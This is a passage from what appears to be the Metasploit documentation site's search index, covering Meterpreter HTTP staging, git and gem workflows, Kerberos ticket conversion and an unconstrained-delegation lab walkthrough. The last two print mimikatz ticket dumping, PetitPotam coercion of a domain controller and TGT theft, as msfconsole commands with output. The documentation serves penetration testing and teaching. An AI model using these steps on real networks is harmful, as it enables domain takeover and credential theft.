Metasploit, this time using WinHTTP. | The proxy would return HTTP/1.0 responses, resulting in WinHTTP refusing to function. | The Meterpreter session would be considered “dead” by Metasploit as a result of the lack of successful communications after staging. | . Examples of these issues are this and this. If you are seeing similar issues it’s because your current Meterpreter binaries don’t have the fallback option. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#combining-stagers-with-meterpreter",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#combining-stagers-with-meterpreter"
  },"810": {
    "doc": "The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers",
    "title": "Conclusion",
    "content": "HTTP/S communications in Windows is a hairy beast, and trying to cater for all cases proves to be quite tricky thanks to the limitations of some APIs, and the variable implementations of others. We’re still working to iron out all of issues, and so please log an issue if you stumble on an edge case that hasn’t yet been covered. Thank you for your patience! . OJ / @TheColonial . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#conclusion",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#conclusion"
  },"811": {
    "doc": "The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers",
    "title": "The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers",
    "content": "Recent changes to HTTP and HTTPS communications in both Meterpreter and its stagers have caused new behaviours that have left some users confused. The aim of this post is to cover the changes that have been made, the rationale behind those changes, and the issues that come with them. By the end of this post, readers should have a clear understanding of the issues related to HTTP/S communications, and be able to diagnose and fix any issues that they might be having. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html"
  },"812": {
    "doc": "Converting kirbi and ccache files",
    "title": "Converting Kerberos Tickets",
    "content": "The auxiliary/admin/kerberos/ticket_converter module is used to convert from a ccache file format to the kirbi file format and vice versa. The main reason you may want to convert between these file types is for use in different tools. For example mimikatz will create tickets for you in the kirbi format but to use that in another tool like Metasploit or Impacket you need to convert it to the ccache format first. ",
    "url": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#converting-kerberos-tickets",
    "relUrl": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#converting-kerberos-tickets"
  },"813": {
    "doc": "Converting kirbi and ccache files",
    "title": "Acquiring tickets",
    "content": "Kerberos tickets can be acquired from multiple sources. For instance: . | Retrieved directly from the KDC with the get_ticket module | Forged using the forge_ticket module after compromising the krbtgt or a service account’s encryption keys | Extracted from memory using Meterpreter and mimikatz: | . meterpreter &amp;gt; load kiwi Loading extension kiwi...#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. \"A La Vie, A L'Amour\" - (oe.eo) ## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \\ / ## &amp;gt; http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' &amp;gt; http://pingcastle.com / http://mysmartlogon.com ***/ Success. meterpreter &amp;gt; kiwi_cmd \"sekurlsa::tickets /export\" Authentication Id : 0 ; 1393218 (00000000:00154242) Session : Network from 0 User Name : DC3$ Domain : DEMO Logon Server : (null) Logon Time : 1/12/2023 9:11:00 PM SID : S-1-5-18 * Username : DC3$ * Domain : DEMO.LOCAL * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? [00000000] Start/End/MaxRenew: 1/12/2023 7:41:41 PM ; 1/13/2023 5:37:45 AM ; 1/1/1601 12:00:00 AM Service Name (02) : LDAP ; DC3 ; @ DEMO.LOCAL Target Name (--) : @ DEMO.LOCAL Client Name (01) : DC3$ ; @ DEMO.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac ab64d555f18de6a3262d921e6dc75dcf884852f551db3114f7983dbaf276e1d6 Ticket : 0x00000012 - aes256_hmac ; kvno = 7 [...] ==================== Base64 of file : [0;154242][email protected] ==================== doQAAAYXMIQAAAYRoIQAAAADAgEFoYQAAAADAgEWooQAAAS2MIQAAASwYYQAAASq MIQAAASkoIQAAAADAgEFoYQAAAAMGwpBREYzLkxPQ0FMooQAAAAmMIQAAAAgoIQA AAADAgECoYQAAAARMIQAAAALGwRMREFQGwNEQzOjhAAABFcwhAAABFGghAAAAAMC ... etc... ==================== . Note that tools often Base64 encode the Kirbi content to display to the user. However the inspect_ticket module expects the input file to be in binary format. To convert base64 strings to binary files: . # Linux cat ticket.b64 | base64 -d &amp;gt; ticket.kirbi # Mac cat ticket.b64 | base64 -D &amp;gt; ticket.kirbi # Powershell [IO.File]::WriteAllBytes(\"ticket.kirbi\", [Convert]::FromBase64String(\"&amp;lt;bas64_ticket&amp;gt;\")) . ",
    "url": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#acquiring-tickets",
    "relUrl": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#acquiring-tickets"
  },"814": {
    "doc": "Converting kirbi and ccache files",
    "title": "Module usage",
    "content": ". | Start msfconsole | Do: use auxiliary/admin/kerberos/ticket_converter | Do: set InputPath /path/to/ccache/or/kirbi/file | Do: set OutputPath /path/to/save/your/converted/file | Do: run | You should see output similar to: [*] [2022.12.16-12:52:56] Converting from ccache to kirbi [*] [2022.12.16-12:52:56] File written to &amp;lt;OutputPath&amp;gt; [*] Auxiliary module execution completed . | Your converted ticket which will have been stored at OutputPath | Example usage in Metasploit: use windows/smb/psexec run rhost=192.168.123.13 username=Administrator domaincontrollerrhost=192.168.123.1 smb::auth=kerberos smb::rhostname=host.demo.local smbdomain=demo.local smbkrb5ccname=/path/to/ccache/ticket . | Example usage in impacket: export KRB5CCNAME=/path/to/ccache/ticket python3 mssqlclient.py DW.LOCAL/[email protected] -k -no-pass . | You may use the inspect_ticket module to prints the contents of the ccache/kirbi file: use auxiliary/admin/kerberos/inspect_ticket | . ",
    "url": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#module-usage",
    "relUrl": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#module-usage"
  },"815": {
    "doc": "Converting kirbi and ccache files",
    "title": "Scenarios",
    "content": "You have a ccache file . If you have a ccache file, for example by forging it using the auxiliary/admin/kerberos/forge_ticket module, but need a file in the kirbi format which is commonly used by mimikatz. Set the InputPath to the location of your ccache file, specify your desired output location with OutputPath and run. Metasploit will automatically detect the file type so there’s no need to tell msfconsole whether it’s a ccache or kirbi file. Example: . msf6 auxiliary(admin/kerberos/ticket_converter) &amp;gt; run inputpath=metasploit_ticket.ccache outputpath=metasploit_ticket.kirbi [*] [2023.01.05-17:01:02] Converting from ccache to kirbi [*] [2023.01.05-17:01:02] File written to /Users/dwelch/dev/metasploit-framework/metasploit_ticket.kirbi [*] Auxiliary module execution completed . You have a kirbi file . The other scenario is if you have a kirbi file, for example tools such as mimikatz will give you tickets in the kirbi format, and you need a ccache for use with another tool such as Metasploit and Impacket. The steps are exactly the same for a kirbi file as they are for a ccache as Metasploit will automatically detect the input file type. Set the InputPath to the location of your ccache file, specify your desired output location with OutputPath and run. Metasploit will automatically detect the file type so there’s no need to tell msfconsole whether it’s a ccache or kirbi file. Example: . msf6 auxiliary(admin/kerberos/ticket_converter) &amp;gt; run inputpath=metasploit_ticket.kirbi outputpath=metasploit_ticket.ccache [*] [2023.01.05-17:01:39] Converting from kirbi to ccache [*] [2023.01.05-17:01:39] File written to /Users/dwelch/dev/metasploit-framework/metasploit_ticket.ccache [*] Auxiliary module execution completed . ",
    "url": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#scenarios"
  },"816": {
    "doc": "Converting kirbi and ccache files",
    "title": "Converting kirbi and ccache files",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/ticket_converter.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/ticket_converter.html"
  },"817": {
    "doc": "Uberhandler",
    "title": "Current Design",
    "content": "Metasploit payload modules are Ruby Modules and come in three types: . | Payload::Type::Single | Payload::Type::Stage | Payload::Type::Stager | . Payloads are created by creating an anonymous Class and including mixins for a Handler and either a single-stage payload or both a stage and stager, like so: . def build_payload(*modules) klass = Class.new(Payload) # Remove nil modules modules.compact! # Include the modules supplied to us with the mad skillz # spoonfu style klass.include(*modules.reverse) return klass end . The result is a Class for each combination of stage + stager + handler. E.g., windows/meterpreter/reverse_tcp includes Msf::Handler::ReverseTcp and the Modules defined in modules/payloads/stagers/windows/reverse_tcp and modules/payloads/stages/windows/meterpreter. As a corollary, this means that stages and stagers are intricately linked with each other and their handlers. ",
    "url": "/docs/development/propsals/uberhandler.html#current-design",
    "relUrl": "/docs/development/propsals/uberhandler.html#current-design"
  },"818": {
    "doc": "Uberhandler",
    "title": "What we need",
    "content": "For the Uberhandler to function, it needs to: . | Track how many exploits currently need its services | Be independent of the payload modules that use it | . The stagers need to: . | Communicate to the handler what kind of stage to send | . From a user’s perspective, we need some way to indicate a generic payload type along with the handler. The generic handlers were an early attempt at providing this same concept. Perhaps something like: . set PAYLOAD uber/meterpreter/reverse_tcp . ",
    "url": "/docs/development/propsals/uberhandler.html#what-we-need",
    "relUrl": "/docs/development/propsals/uberhandler.html#what-we-need"
  },"819": {
    "doc": "Uberhandler",
    "title": "Uberhandler",
    "content": " ",
    "url": "/docs/development/propsals/uberhandler.html",
    "relUrl": "/docs/development/propsals/uberhandler.html"
  },"820": {
    "doc": "Unconstrained delegation",
    "title": "Unconstrained Delegation Exploitation",
    "content": "If a computer account is configured for unconstrained delegation, and an attacker has administrative access to it then the attacker can leverage it to compromise the Active Directory domain. ",
    "url": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html#unconstrained-delegation-exploitation",
    "relUrl": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html#unconstrained-delegation-exploitation"
  },"821": {
    "doc": "Unconstrained delegation",
    "title": "Lab setup",
    "content": "For this attack to work there must be a computer account (workstation or server) in the active directory domain that has been configured for unconstrained delegation. On the domain controller: . | Open “Active Directory Users and Computers” | Navigate to the computer account, right click and select “Properties” | In the “Delegation” tab, select “Trust this computer for delegation to any service (Kerberos only)” | . On the target computer: . | Force an update of group policy by running gpupdate /force | Reboot the computer | . ",
    "url": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html#lab-setup",
    "relUrl": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html#lab-setup"
  },"822": {
    "doc": "Unconstrained delegation",
    "title": "Attack Workflow",
    "content": "This attack assumes that the attacker has: . | The IP address of the domain controller. | The active directory domain name. | A compromised domain account (no special privileges are necessary). | The ability to fully compromise a target system through some means. | (Optional but recommended) Metasploit running with an attached database so the Kerberos ticket cache can be used. Verify this using the db_status command. | . At a high-level the summary to leverage this attack chain is: . | Identify a target computer account configured with unconstrained delegation. | Compromise that target computer account to open a Meterpreter session with administrative privileges (SYSTEM works). | Coerce authentication to the compromised target from a domain controller. | Dump the Kerberos tickets from the compromised targets to obtain a TGT from the domain controller’s computer account. | Use the TGT to authenticate to the domain controller as itself (the computer account). | . Target Identification . The unconstrained delegation setting is stored as a bit flag in the userAccountControl LDAP attribute. A domain account can be used with the auxiliary/gather/ldap_query module to identify computer accounts configured for unconstrained delegation. Note that by default domain controllers themselves are configured for unconstrained delegation and should be ignored as targets. Use the ENUM_UNCONSTRAINED_DELEGATION action to enumerate targets: . msf6 &amp;gt; use auxiliary/gather/ldap_query msf6 auxiliary(gather/ldap_query) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(gather/ldap_query) &amp;gt; set DOMAIN msflab.local DOMAIN =&amp;gt; msflab.local msf6 auxiliary(gather/ldap_query) &amp;gt; set USERNAME aliddle USERNAME =&amp;gt; aliddle msf6 auxiliary(gather/ldap_query) &amp;gt; set PASSWORD Password1! PASSWORD =&amp;gt; Password1! msf6 auxiliary(gather/ldap_query) &amp;gt; set ACTION ENUM_UNCONSTRAINED_DELEGATION ACTION =&amp;gt; ENUM_UNCONSTRAINED_DELEGATION msf6 auxiliary(gather/ldap_query) &amp;gt; run [*] Running module against 192.168.159.10 [*] Discovering base DN automatically [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [+] 192.168.159.10:389 Discovered schema DN: DC=msflab,DC=local CN=WS01 CN=Computers DC=msflab DC=local ======================================= Name Attributes ---- ---------- cn WS01 objectcategory CN=Computer,CN=Schema,CN=Configuration,DC=msflab,DC=local samaccountname WS01$ CN=DC OU=Domain Controllers DC=msflab DC=local ============================================== Name Attributes ---- ---------- cn DC memberof CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=msflab,DC=local || CN=Cert Publishers,CN=Users,DC=msflab,DC=local objectcategory CN=Computer,CN=Schema,CN=Configuration,DC=msflab,DC=local samaccountname DC$ [*] Auxiliary module execution completed msf6 auxiliary(gather/ldap_query) &amp;gt; . This results in two potential targets, WS01 and DC. Next, use the ENUM_DOMAIN_CONTROLLERS action to identify the domain controllers to remove from the list of potential targets. msf6 auxiliary(gather/ldap_query) &amp;gt; set ACTION ENUM_DOMAIN_CONTROLLERS ACTION =&amp;gt; ENUM_DOMAIN_CONTROLLERS msf6 auxiliary(gather/ldap_query) &amp;gt; run [*] Running module against 192.168.159.10 [*] Discovering base DN automatically [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [+] 192.168.159.10:389 Discovered schema DN: DC=msflab,DC=local CN=DC OU=Domain Controllers DC=msflab DC=local ============================================== Name Attributes ---- ---------- distinguishedname CN=DC,OU=Domain Controllers,DC=msflab,DC=local dnshostname DC.msflab.local name DC operatingsystem Windows Server 2019 Standard operatingsystemversion 10.0 (17763) [*] Auxiliary module execution completed msf6 auxiliary(gather/ldap_query) &amp;gt; . This shows that DC is a domain controller and should be removed from the list, leaving WS01 as the only viable target. Exploitation . Now the WS01 system needs to be compromised through some means to obtain a Meterpreter session. Once a Meterpreter session has been obtained, the Domain Controller needs to be coerced into authenticating to the target. The auxiliary/scanner/dcerpc/petitpotam module can be used for this purpose. Use the module, and take care to set the LISTENER option to the hostname of the compromised host. The hostname must be used and not an IP address. Set the remaining options including RHOSTS to the domain controller, and SMBUser / SMBPass to the credentials of the compromised domain account. msf6 &amp;gt; use auxiliary/scanner/dcerpc/petitpotam msf6 auxiliary(scanner/dcerpc/petitpotam) &amp;gt; set LISTENER ws01.msflab.local LISTENER =&amp;gt; ws01.msflab.local msf6 auxiliary(scanner/dcerpc/petitpotam) &amp;gt; set SMBUser aliddle SMBUser =&amp;gt; aliddle msf6 auxiliary(scanner/dcerpc/petitpotam) &amp;gt; set SMBPass Password1! SMBPass =&amp;gt; Password1! msf6 auxiliary(scanner/dcerpc/petitpotam) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(scanner/dcerpc/petitpotam) &amp;gt; run [+] 192.168.159.10:445 - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful [*] 192.168.159.10:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/dcerpc/petitpotam) &amp;gt; . If the module does not indicate that the attack was successful, another tool like Coercer can be used to try additional methods. Now that the domain controller has authenticated to the target it’s necessary to dump the kerberos tickets from the compromised target. Use the post/windows/manage/kerberos_tickets module and the DUMP_TICKETS action to dump the TGTs from the compromised host. If the attack was successful there should be at least one TGT from the domain controller’s computer account. msf6 &amp;gt; use post/windows/manage/kerberos_tickets msf6 post(windows/manage/kerberos_tickets) &amp;gt; set SESSION -1 SESSION =&amp;gt; -1 msf6 post(windows/manage/kerberos_tickets) &amp;gt; set SERVICE krbtgt/* SERVICE =&amp;gt; krbtgt/* msf6 post(windows/manage/kerberos_tickets) &amp;gt; run [*] LSA Handle: 0x000001efe1c415a0 [*] LogonSession LUID: 0x00004bc1d [*] User: MSFLAB\\DC$ [*] Session: 0 [*] AuthenticationPackage: Kerberos [*] LogonType: Network (3) [*] LogonTime: 2023-08-23 08:33:17 -0400 [*] Ticket[0] [*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823151727_default_192.168.159.10_mit.kerberos.cca_488233.bin Primary Principal: [email protected] Ccache version: 4 Creds: 1 Credential[0]: Server: krbtgt/[email protected] Client: [email protected] Ticket etype: 18 (AES256) Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0 Subkey: false Ticket Length: 1006 Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE) Addresses: 0 Authdatas: 0 Times: Auth time: 1969-12-31 19:00:00 -0500 Start time: 2023-08-23 08:33:17 -0400 End time: 2023-08-23 18:33:17 -0400 Renew Till: 2023-08-30 08:33:17 -0400 Ticket: Ticket Version Number: 5 Realm: MSFLAB.LOCAL Server Name: krbtgt/MSFLAB.LOCAL Encrypted Ticket Part: Ticket etype: 18 (AES256) Key Version Number: 2 Cipher: L/csyZle+LDn1i7Yqci0vbZCHrjO8CeQXBSix3d1lCR66sR0Zq/ogR/6g3X8yGn9acvGjAtt29ZErQe4FA3ttZ6MA2p8QldvbQCvELLpQkOHKrmzd2YhWy5YxfbwzFpZT0OtFEB0gYW3AQuOyRKk5vCuljZH6bPaz77g8KUejFx80tJbmz6n2GLOzG8rcMiy/i/zYreG6TLnjZJgw3UVABFSjUKs20eSK2Le5OxSKfcBQTwaRp+BPdXWGbMNYWwTUntAZGC5G6DE9xglY0+T2D/9HFSWVesrnduMmzHR9NojQYezHJorMKh7m5/KeNEzuJUDLCkgX/Uscq8dc6XMaFH7aIsg5+nlAZBPTrYtkayun6AaTLJpqLg90ab3iYCZpvdCBKBPapg3271YVHe8i7OaDDJWXMNooi+6Jg+B1cnBRH9qQ5T2k7RQLMNez9P8dvuMkDmFpRz5KOJk+w+Mz6XFeu9g1Z4zXQ6msI060PrwvAENevTN9DKUWtDGBCQMTjBDm75sMA7Aq8KgBqKYUhP+CV+HzgFou4P1/t3l+udRBIYfQw68EHW2dQE/ZZR+oLPPHbCsbnpkp/rSFjdsl0E9Zm4upPty3M+sKd2fdZSLXs5CLBs5WeZmPrXHrHnyC/AnoLNQVTVCtv5EpM50BWooXWKHljLctHxN/W6ZXgqwZ4R7KNYIrtaAsmLrkq2K/z+zsuAWRoDKFtLWZMD9eqfsGi2bRBqPf74+mi1bPXL/1eWlUwmrjr5Buj4kvC8XB+wTRoAkSrjoAx7IglfSIKdW/5N3CX6G+smJWZCsrGIvouTzIzcpHCXgoaHypnm2B9G7yIwkDgpCFd4MW3t8ZrZXOjuReQ6Aiy9mXHlbReX9G3Xl0fj7z4cIKSV4YiyEkjXJE+eAT7GdtJEPFXJJw6Fxhdam+FL+SKVvu4kw+uvqfz72GDG24/KqM3/0L58M96oEd1LHnVoHwuPtfDA7xhvHDu8iYZOkOjDc5cwMCU0MmW5A1cijTuNfSeRRHx6xXLPKkIJH/5XWeg7BAG3lnlOgS/HKj+Uhti7fabZHUvXyGAdA7CJzZ2OUlZY6Acm9JU2EuUfFvnpEjAtasckDA43pb/r4ZNIZPxcq6gpgcdFpZIb8H7bbWdIIinDJfFkEunJ7E1TG9wSbX6j6JfThG31L7EBW+UPHlDa4k1wPFMP3lNgleVUBi0n24T1RBTb6c5W0Cw== [*] LogonSession LUID: 0x00001052b [*] User: Window Manager\\DWM-1 [*] Session: 1 [*] AuthenticationPackage: Negotiate [*] LogonType: Interactive (2) [*] LogonTime: 2023-08-23 08:32:38 -0400 ... omitted for brevity ... In this case, a TGT for the MSFLAB\\DC$ account was obtained through the logon session with LUID 0x00004bc1d. The ticket was stored to disk in a ccache file. The ticket can also be seen in the output of klist. msf6 post(windows/manage/kerberos_tickets) &amp;gt; klist Kerberos Cache ============== id host principal sname issued status path -- ---- --------- ----- ------ ------ ---- 411 192.168.159.10 [email protected] krbtgt/[email protected] 2023-08-23 09:32:46 -0400 active /home/smcintyre/.msf4/loot/20230823151744_default_192.168.159.10_mit.kerberos.cca_307418.bin 407 192.168.159.10 [email protected] krbtgt/[email protected] 2023-08-23 15:14:46 -0400 active /home/smcintyre/.msf4/loot/20230823151735_default_192.168.159.10_mit.kerberos.cca_760842.bin msf6 post(windows/manage/kerberos_tickets) &amp;gt; . Using The Ticket . Now that at TGT for the domain controller has been obtained, it can be used in a Pass-The-Ticket style attack whereby the attacker uses it to authenticate to the target. The auxiliary/gather/windows_secrets_dump module is a good one to use for this purpose as it will yield additional accounts while avoiding running any kind of payload on the domain controller. ",
    "url": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html#attack-workflow",
    "relUrl": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html#attack-workflow"
  },"823": {
    "doc": "Unconstrained delegation",
    "title": "Unconstrained delegation",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html"
  },"824": {
    "doc": "Unstable Modules",
    "title": "Landing to Unstable",
    "content": "Unstable modules have their own special directory structure – they should not hit the regular modules/ subdirectory, since we don’t want to conflict with existing or future modules. We also want to make it easy to spot which modules are unstable. So, new modules should get landed there with the following procedure. | First, get unstable up to date with upstream/master: git checkout unstable; git merge upstream/master; push upstream | Create a local branch off of the PR: git checkout -b temp-pr1234 --track upstream/pr/1234 | Create a local branch off of unstable: git checkout -b unstable-pr1234-modulename --track upstream/unstable | Find the module paths: git diff upstream/master...upstream/pr/1234 --name-only | Git checkout the module(s) in question: git checkout temp-pr1234 modules/exploits/path/to/module.rb | Move the files to the appropriate directory: git mv modules/exploits/path/to/module.rb unstable-modules/exploits/incomplete | Commit the result: git commit | Send a pull request targeting the unstable branch, not the master branch: https://github.com/YOUR GITHUB USERNAME/metasploit-framework/compare/rapid7:unstable…unstable-pr1234-modulename?expand=1 . Be sure to mention the original pull request number in the description so the PR will be updated accordingly. | . This assumes you’re set up for development using the instructions mentioned at https://r-7.co/MSF-DEV and have configured Rapid7’s branch as the “upstream” repo. ",
    "url": "/docs/development/maintainers/process/unstable-modules.html#landing-to-unstable",
    "relUrl": "/docs/development/maintainers/process/unstable-modules.html#landing-to-unstable"
  },"825": {
    "doc": "Unstable Modules",
    "title": "Example",
    "content": "For an example of this procedure, see PR #2801. ",
    "url": "/docs/development/maintainers/process/unstable-modules.html#example",
    "relUrl": "/docs/development/maintainers/process/unstable-modules.html#example"
  },"826": {
    "doc": "Unstable Modules",
    "title": "Unstable Libraries",
    "content": "If someone has library changes that cannot be merged to master, we cannot hang on to them in unstable. There is no sensible way to maintain that kind of branch over any reasonable time period, since conflicts will surely abound soon. Unstable scripts and plugins are okay, though. ",
    "url": "/docs/development/maintainers/process/unstable-modules.html#unstable-libraries",
    "relUrl": "/docs/development/maintainers/process/unstable-modules.html#unstable-libraries"
  },"827": {
    "doc": "Unstable Modules",
    "title": "Rescuing unstable modules",
    "content": "If you’d like to rescue an unstable module, great! Just note that it’s an unstable rescue in the pull request, and the original PR number (if you can find it), when you pull it back out. You can do a similar git checkout to grab the file and then git mv it to the right spot again. ",
    "url": "/docs/development/maintainers/process/unstable-modules.html#rescuing-unstable-modules",
    "relUrl": "/docs/development/maintainers/process/unstable-modules.html#rescuing-unstable-modules"
  },"828": {
    "doc": "Unstable Modules",
    "title": "Safety",
    "content": "This is not unstable in the Debian sense – they’re not latest versions, they get no fixes unless someone adopts them, and they may end up crashing out all of framework when loaded. No guarantees are made, ever, despite things like ExploitRanking. ",
    "url": "/docs/development/maintainers/process/unstable-modules.html#safety",
    "relUrl": "/docs/development/maintainers/process/unstable-modules.html#safety"
  },"829": {
    "doc": "Unstable Modules",
    "title": "Unstable Modules",
    "content": "Sometimes, modules contributed to Metasploit don’t quite cross the finish line. This can be for a variety of reasons. Most often, it is because the module submission was a “drive-by” – the original author is not interested (or not able) to implement and test needed changes in order to make the module production worthy. Luckily, git makes it easy to be a pack rat for these unfinished modules. We have a separate branch for these unstable modules, imaginatively named, Unstable. ",
    "url": "/docs/development/maintainers/process/unstable-modules.html",
    "relUrl": "/docs/development/maintainers/process/unstable-modules.html"
  },"830": {
    "doc": "Using Git",
    "title": "Using Git",
    "content": "Use this collection of resources to work with the Metasploit Framework’s git repository. | Cheatsheet | Reference Sites | Setting Up a Metasploit Development Environment - this will walk you through creating a pull request | Landing Pull Requests - this is the procedure that Metasploit core devs go through to merge your request | Remote Branch Pruning | . A fork is when you snapshot someone else’s codebase into your own repo, presumably on github.com, and that codebase may have it’s own branches, but you are usually snapshotting the master branch. You usually then clone your fork to your local machine. You then create your own branches, which are offshoots of your own fork. Those snapshots, even if pushed to your github are not a part of the original codebase, in this case rapid7/metasploit-framework. If you then submit a pull request, your branch (generally) can be pulled into the original codebase’s master branch (usually… you could be pulled into an experimental branch or something if your code was a massive change or something, but that’s not typical). You only fork once, you clone as many times as you have machines on which you want to code, and you branch, commit, and push as often as you like (you don’t always have to push, you can push later or not at all, but you’ll have to push before doing a pull request, a.k.a. PR), and you submit a PR when you are ready. See below . github.com/rapid7/metasploit-framework --&amp;gt; fork --&amp;gt; github.com/&amp;lt;...&amp;gt;/metasploit-framework ^ | git clone git://github.com/&amp;lt;...&amp;gt;/metasploit-framework.git | `-- accepted &amp;lt;-- pull request V ^ /home/&amp;lt;...&amp;gt;/repo/metasploit-framework | | github.com/&amp;lt;...&amp;gt;/metasploit-framework/branch_xyz | | | V V | V branch_abc ... `-- push &amp;lt;-- branch_xyz . (Thanks to kernelsmith for this excellent description) . ",
    "url": "/docs/development/get-started/git/using-git.html",
    "relUrl": "/docs/development/get-started/git/using-git.html"
  },"831": {
    "doc": "Using local Gems",
    "title": "Introduction",
    "content": "Often times when testing Gem file updates, particularly from other repositories such as rex-powershell or rex-text, one will need to find some way of testing whether the updated Gem file works as expected within Metasploit Framework. There are many different ways to do this, however this guide will only focus on one method for simplicities sake, as this is the one that has been known to work with the least amount of prerequisite setup. ",
    "url": "/docs/development/maintainers/ruby-gems/using-local-gems.html#introduction",
    "relUrl": "/docs/development/maintainers/ruby-gems/using-local-gems.html#introduction"
  },"832": {
    "doc": "Using local Gems",
    "title": "Instructions",
    "content": ". | Set up a working Metasploit development setup as described at the Setting Up a Development Environment wiki page. Be sure to set up your SSH keys as part of this setup. | Clone whatever PR it is that you wish to work on. For example to work on https://github.com/rapid7/rex-text/pull/30, do git clone [email protected]:rapid7/rex-text.git, then cd rex-text, followed by git checkout origin/pr/30. | Go to the location of your git clone of Metasploit Framework and do cp Gemfile.local.example Gemfile.local. Ensure that no file named Gemfile.local.lock exists. If one does, remove it. | Inside your Gemfile.local file, edit it so it looks something like the following: | . ## # Example Gemfile.local file for Metasploit Framework # # The Gemfile.local file provides a way to use other gems that are not # included in the standard Gemfile provided with Metasploit. # This filename is included in Metasploit's .gitignore file, so local changes # to this file will not accidentally show up in future pull requests. This # example Gemfile.local includes all gems in Gemfile using instance_eval. # It also creates a new bundle group, 'local', to hold additional gems. # # This file will not be used by default within the framework. As such, one # must first install the custom Gemfile.local with bundle: # bundle install --gemfile Gemfile.local # # Note that msfupdate does not consider Gemfile.local when updating the # framework. If it is used, it may be necessary to run the above bundle # command after the update. # ### # Include the Gemfile included with the framework. This is very # important for picking up new gem dependencies. msf_gemfile = File.join(File.dirname(__FILE__), 'Gemfile') if File.readable?(msf_gemfile) instance_eval(File.read(msf_gemfile)) end # Create a custom group group :local do gem 'rex-powershell', path: '/home/gwillcox/git/rex-powershell' end . Notice in particular the final part of this code: . # Create a custom group group :local do gem 'rex-powershell', path: '/home/gwillcox/git/rex-powershell' end . For each gem you want to test, you will need both the name of the gem, for example rex-powershell or rex-text, followed by path: and the path where the corresponding Git repository for that gem is on disk. Do this for each custom gem that you want to test out, then save and close Gemfile.local. | Whilst still inside the cloned Metasploit Framework git repository, execute bundle install --gemfile Gemfile.local. You should see a line similar to the following: | . Using rex-powershell 0.1.87 from source at `/home/gwillcox/git/rex-powershell` . | If any errors occur, follow the directions in the output to try and resolve the conflicts. If all else fails, delete Gemfile.local.lock and run bundle install --gemfile Gemfile.local again. | . ",
    "url": "/docs/development/maintainers/ruby-gems/using-local-gems.html#instructions",
    "relUrl": "/docs/development/maintainers/ruby-gems/using-local-gems.html#instructions"
  },"833": {
    "doc": "Using local Gems",
    "title": "Using local Gems",
    "content": " ",
    "url": "/docs/development/maintainers/ruby-gems/using-local-gems.html",
    "relUrl": "/docs/development/maintainers/ruby-gems/using-local-gems.html"
  },"834": {
    "doc": "Running modules",
    "title": "Getting started",
